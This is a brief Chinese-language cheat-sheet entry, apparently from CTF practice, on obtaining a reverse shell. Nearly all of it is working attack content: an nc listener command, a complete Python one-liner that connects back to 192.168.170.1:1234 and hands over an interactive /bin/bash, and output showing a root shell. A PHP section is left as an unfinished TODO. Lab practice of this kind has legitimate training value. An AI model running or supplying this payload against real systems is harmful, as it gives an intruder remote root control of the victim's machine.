参考:
http://zeroyu.xyz/2017/01/21/Commix%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/
Python
先在自己机器上执行
[~]$ nc -vl 192.168.170.1 1234
即在192.168.170.1/24网段上监听1234端口。
然后在target的shell中执行
[~/repos/CTF/BSides-CTF-2017]$ python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.170.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
反弹出去一个/bin/bash,然后自己机器上就得到了一个bash。
[~]$ nc -vl 192.168.170.1 1234 [17:20:18]
root@kali:~/repos/CTF/BSides-CTF-2017#
root@kali:~/repos/CTF/BSides-CTF-2017# id
id
uid=0(root) gid=0(root) groups=0(root)
PHP
//TODO
